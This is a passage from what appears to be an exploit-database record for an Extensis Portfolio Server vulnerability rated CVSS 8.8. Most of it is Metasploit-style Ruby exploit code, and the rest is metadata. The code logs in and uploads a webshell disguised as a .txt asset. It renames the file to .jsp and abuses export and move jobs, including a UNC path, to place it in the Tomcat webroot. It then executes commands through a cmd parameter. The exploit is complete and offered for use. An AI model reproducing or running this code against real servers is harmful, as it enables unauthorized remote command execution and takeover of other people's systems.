    end\n        \n        if res.code == 200\n          begin\n            json_res = res.get_json_document\n          rescue JSON::ParserError\n            fail_with(Failure::UnexpectedReply, 'Invalid JSON response from upload endpoint')\n          end\n          \n          unless json_res.is_a?(Hash)\n            fail_with(Failure::UnexpectedReply, 'Invalid upload response format')\n          end\n          \n          asset_id = json_res['assetId']\n          if asset_id.nil?\n            fail_with(Failure::UnexpectedReply, 'No assetId in upload response')\n          end\n          \n          print_good(\"Webshell uploaded successfully. Asset ID: #{asset_id}\")\n          return asset_id\n        else\n          fail_with(Failure::Unknown, \"Upload failed: HTTP #{res.code}\")\n        end\n      end\n    \n      def rename_webshell(session, catalog_id, asset_id, old_filename)\n        new_filename = old_filename.gsub('.txt', '.jsp')\n        print_status(\"Renaming webshell from #{old_filename} to #{new_filename}\")\n        \n        data = {\n          'embed'   => false,\n          'query'   => {\n            'term' => {\n              'operator' => 'assetsById',\n              'values'   => [asset_id]\n            }\n          },\n          'changes' => [\n            {\n              'action'          => 'replaceAllValues',\n              'field'           => 'Filename',\n              'existingValues'  => 'null',\n              'newValues'       => [new_filename]\n            }\n          ]\n        }\n        \n        res = send_request_cgi({\n          'method'    => 'POST',\n          'uri'       => normalize_uri(target_uri.path, \"/api/v1/catalog/#{catalog_id}/asset/updateFieldValues\"),\n          'ctype'     => 'application/json',\n          'vars_get'  => { 'session' => session },\n          'data'      => data.to_json\n        })\n        \n        if res.nil?\n          fail_with(Failure::Unreachable, \"Connection failed during rename\")\n        end\n        \n        if res.code == 204\n          print_good(\"Successfully renamed webshell to #{new_filename}\")\n          return new_filename\n        else\n          fail_with(Failure::Unknown, \"Rename failed: HTTP #{res.code}\")\n        end\n      end\n    \n      def get_webroot_path\n        path = datastore['WEBROOT_PATH'].to_s\n        return path unless path.empty?\n    \n        [\n          'C:\\\\Program Files (x86)\\\\Extensis\\\\Portfolio Server\\\\applications\\\\tomcat\\\\servers\\\\main\\\\webapps\\\\ROOT',\n          'C:\\\\Program Files\\\\Extensis\\\\Portfolio Server\\\\applications\\\\tomcat\\\\servers\\\\main\\\\webapps\\\\ROOT',\n          'D:\\\\Program Files (x86)\\\\Extensis\\\\Portfolio Server\\\\applications\\\\tomcat\\\\servers\\\\main\\\\webapps\\\\ROOT',\n          'D:\\\\Program Files\\\\Extensis\\\\Portfolio Server\\\\applications\\\\tomcat\\\\servers\\\\main\\\\webapps\\\\ROOT'\n        ].first\n      end\n    \n      def write_to_webroot(session, asset_id, catalog_info, filename)\n        unless catalog_info.is_a?(Hash)\n          fail_with(Failure::UnexpectedReply, 'Invalid catalog info structure')\n        end\n        \n        catalog_id       = catalog_info['catalog_id']\n        storage_type     = catalog_info['storage_type']\n        watchfolder_path = catalog_info['watchfolder_path']\n        \n        print_status(\"Attempting to write webshell to webroot\")\n        \n        webroot_base = get_webroot_path\n        \n        if storage_type == 'Vault'\n          webroot_path = webroot_base\n          job_data = {\n            'job'   => {\n              'description' => 'JOB_TYPE_EXPORT_ASSETS',\n              'query'       => {\n                'term' => {\n                  'operator' => 'assetsById',\n                  'values'   => [asset_id]\n                }\n              },\n              'tasks'       => [\n                {\n                  'type'      => 'exportAssets',\n                  'catalogId' => catalog_id,\n                  'settings'  => [\n                    {\n                      'name'  => 'destination',\n                      'value' => webroot_path\n                    }\n                  ]\n                }\n              ]\n            },\n            'query' => {\n              'term' => {\n                'operator' => 'assetsById',\n                'values'   => [asset_id]\n              }\n            }\n          }\n        else \n          if watchfolder_path.nil? || !watchfolder_path.include?(':')\n            fail_with(Failure::UnexpectedReply, \"Invalid watchfolder path format: #{watchfolder_path}\")\n          end\n          \n          parts = watchfolder_path.split(':')\n          if parts.length >= 3\n            hostname = parts[2]\n    \n            unc_root = webroot_base.gsub('C:', \"::#{hostname}:C$\").gsub('\\\\', ':')\n            webroot_path = unc_root\n          else\n            fail_with(Failure::UnexpectedReply, \"Unexpected watchfolder path format: #{watchfolder_path}\")\n          end\n          \n          job_data = {\n            'job'   => {\n              'description' => 'JOB_TYPE_MOVE_ASSETS',\n              'query'       => {\n                'term' => {\n                  'operator' => 'assetsById',\n                  'values'   => [asset_id]\n                }\n              },\n              'tasks'       => [\n                {\n                  'type'      => 'moveAssets',\n                  'settings'  => [\n                    {\n                      'name'  => 'destinationCatalog',\n                      'value' => catalog_id\n                    },\n                    {\n                      'name'  => 'destination',\n                      'value' => webroot_path\n                    },\n                    {\n                      'name'  => 'preserveFolderStructure',\n                      'value' => false\n                    },\n                    {\n                      'name'  => 'sourceFolder',\n                      'value' => ''\n                    }\n                  ]\n                }\n              ]\n            },\n            'query' => {\n              'term' => {\n                'operator' => 'assetsById',\n                'values'   => [asset_id]\n              }\n            }\n          }\n        end\n        \n        res = send_request_cgi({\n          'method'    => 'POST',\n          'uri'       => normalize_uri(target_uri.path, '/api/v1/job/run'),\n          'ctype'     => 'application/json',\n          'vars_get'  => {\n            'session' => session,\n            'catalog' => catalog_id\n          },\n          'data'      => job_data.to_json\n        })\n        \n        if res.nil?\n          fail_with(Failure::Unreachable, \"Connection failed during job execution\")\n        end\n        \n        if res.code == 200\n          full_webroot_path = \"#{webroot_base}\\\\#{filename}\"\n          register_file_for_cleanup(full_webroot_path)\n          \n          protocol = ssl? ? 'https' : 'http'\n          target_host = rhost\n          target_port = rport\n          \n          webshell_url = \"#{protocol}://#{target_host}:#{target_port}/#{filename}?cmd=<command>\"\n          print_good(\"Successfully exported webshell to filesystem\")\n          print_good(\"Webshell URL: #{webshell_url}\")\n          return true\n        elsif res.code == 403\n          fail_with(Failure::NoAccess, \"Export failed: Insufficient privileges - Need Catalog Administrator privileges for Vault catalogs\")\n        else\n          fail_with(Failure::Unknown, \"Export failed: HTTP #{res.code}\")\n        end\n      end\n    \n      def execute_command(cmd, filename)\n        res = send_request_cgi({\n          'method'    => 'GET',\n          'uri'       => normalize_uri(target_uri.path, filename),\n          'vars_get'  => { 'cmd' => cmd }\n        })\n        \n        if res.nil?\n          print_error(\"Connection failed for command execution\")\n          return nil\n        end\n        \n        if res.code == 200 && res.body\n          match = res.body.match(/<pre>(.*?)<\\/pre>/m)\n          return match[1].strip if match\n          return res.body\n        end\n        \n        nil\n      end\n    \n      def exploit\n        filename = Rex::Text.rand_text_alpha(10) + '.txt'\n        \n        session = login()\n        \n        catalog_info = get_catalog_info(session)\n        \n        unless catalog_info.is_a?(Hash)\n          fail_with(Failure::UnexpectedReply, 'Invalid catalog info structure')\n        end\n        \n        if catalog_info['storage_type'] == 'Filesystem' && catalog_info['watchfolder_id'].nil?\n          fail_with(Failure::NotFound, 'No watchfolder found for Filesystem catalog')\n        end\n        \n        asset_id = upload_webshell(session, catalog_info['catalog_id'], filename, catalog_info['watchfolder_id'])\n        \n        new_filename = rename_webshell(session, catalog_info['catalog_id'], asset_id, filename)\n        \n        success = write_to_webroot(session, asset_id, catalog_info, new_filename)\n        \n        print_status(\"Waiting #{datastore['DELAY']} seconds for file to be written...\")\n        Rex.sleep(datastore['DELAY'])\n        \n        print_status(\"Testing webshell with 'whoami' command\")\n        result = execute_command('whoami', new_filename)\n        \n        if result && !result.empty?\n          print_good(\"Webshell test successful! Output:\\n#{result}\")\n          print_status(\"Webshell is ready for payload execution\")\n        else\n          print_error(\"Webshell test failed - manual check required\")\n        end\n        \n      rescue Rex::ConnectionError => e\n        fail_with(Failure::Unreachable, \"Connection failed: #{e.message}\")\n      end\n    end\n    \n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215719",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215719/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply